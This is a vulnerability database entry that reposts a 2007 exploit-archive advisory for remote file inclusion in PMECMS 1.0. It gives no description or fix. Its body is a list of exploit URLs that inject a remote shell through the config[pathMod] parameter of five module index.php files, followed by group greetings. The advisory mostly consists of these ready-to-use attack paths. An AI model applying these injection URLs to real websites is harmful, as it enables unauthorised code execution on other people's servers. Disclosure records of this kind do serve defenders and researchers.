PMECMS <= 1.0 config[pathMod] Remote File Inclusion Vulnerabilities

2014-07-01T00:00:00
ID SSV:64667
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                # PMECMS <= 1.0 Multiple Remote File Inclusion Vulnerabilities
# D.Script: http://www.pmecms.com/export/maj/PMECMS_Standard_os1.0.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/mod/image/index.php?config[pathMod]=Shell
# Exploit:[Path]/mod/liens/index.php?config[pathMod]=Shell
# Exploit:[Path]/mod/liste/index.php?config[pathMod]=Shell
# Exploit:[Path]/mod/special/index.php?config[pathMod]=Shell
# Exploit:[Path]/mod/texte/index.php?config[pathMod]=Shell
# And More Download Script ......!!!
# Greetz To: Tryag-Team ....##

# milw0rm.com [2007-05-04]